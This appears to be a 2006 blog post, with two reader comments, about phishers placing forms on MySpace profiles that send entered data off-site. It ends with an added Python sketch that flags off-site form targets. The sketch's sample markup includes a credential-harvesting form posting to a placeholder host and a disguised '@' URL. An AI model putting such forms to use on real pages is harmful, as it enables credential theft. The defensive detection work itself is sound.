I just came across a post from Netcraft that describes a very worrying situation over at MySpace. Turns out MySpace is allowing so much design flexibility on their pages that hackers have discovered a way, using phishing techniques, to harvest your personal data without even the wisest of users realising they have just been robbed.
Check out these pictures courtesy of Netcraft’s news blog.

The red box below shows where the data you entered would go if you submitted it. Notice how the address isn’t a myspace.com address any longer. Very worrying because most anti-phishing products wouldn’t pick up this kind of fraud, at least not yet.

If you want to get the full story, check out Netcraft’s post “MySpace Accounts Compromised by Phishers”. I haven’t found out yet if MySpace has taken the site down, but one of their users has been speaking out and finding other phishing examples.
Remember, no matter where you are, always be careful. Be cynical, and be cautious.
Roger Kondrat 11.02.06 at 12:01 pm
Quick little update:
I just found a related PCWorld article - Phishing attack targets myspace users
Marcus Greenwood 11.02.06 at 12:33 pm
i don’t really think this is the fault of myspace. any site which allows users to modify the HTML is susceptible to this kind of phishing attack. not sure quite what they’d be able to get out of taking control of someone’s myspace account??
it may be possible for them to filter out code which allows a form to be created which posts to another site and i’d be surprised if they don’t do something like this soon.
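The check discussed above (a form on a profile page whose submit address is no longer the site's own, and the idea of filtering such forms out) can be sketched as follows. This is an added example, not code from Netcraft, MySpace or the commenters. The hostnames `profile.example` and `collector.invalid`, the sample markup and the function names are all constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attributes that decide where a submission is sent, per tag.
TARGET_ATTRS = {"form": "action", "button": "formaction", "input": "formaction"}

# Constructed sample of user-supplied profile markup (hostnames are placeholders).
SAMPLE_PROFILE = """
<form action="/search"><input name="q"></form>
<FORM METHOD="post" ACTION="http://collector.invalid/login.php">
  <input name="email"><input type="password" name="password">
  <input type="submit" formaction="//collector.invalid/alt">
</FORM>
<form action="https://profile.example@collector.invalid/x"></form>
"""


class _FormTargetFinder(HTMLParser):
    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.site_host = urlsplit(base_url).hostname
        self.offsite = []

    def handle_starttag(self, tag, attrs):
        wanted = TARGET_ATTRS.get(tag)  # tag and attribute names arrive lowercased
        for name, value in attrs:
            if name == wanted and value and not self._same_site(value):
                self.offsite.append((tag, value.strip()))

    def _same_site(self, value):
        # Resolve relative and protocol-relative URLs against the page URL first.
        target = urlsplit(urljoin(self.base_url, value.strip()))
        if target.scheme not in ("http", "https"):
            return False
        host = target.hostname or ""
        return host == self.site_host or host.endswith("." + self.site_host)


def offsite_form_targets(html, base_url):
    """Return (tag, url) pairs for form targets that leave base_url's site."""
    finder = _FormTargetFinder(base_url)
    finder.feed(html)
    finder.close()
    return finder.offsite


if __name__ == "__main__":
    for tag, url in offsite_form_targets(SAMPLE_PROFILE, "https://profile.example/user/1"):
        print(f"off-site target on <{tag}>: {url}")
```

A site accepting user HTML could reject or strip any markup for which this function returns a non-empty list before the page is published.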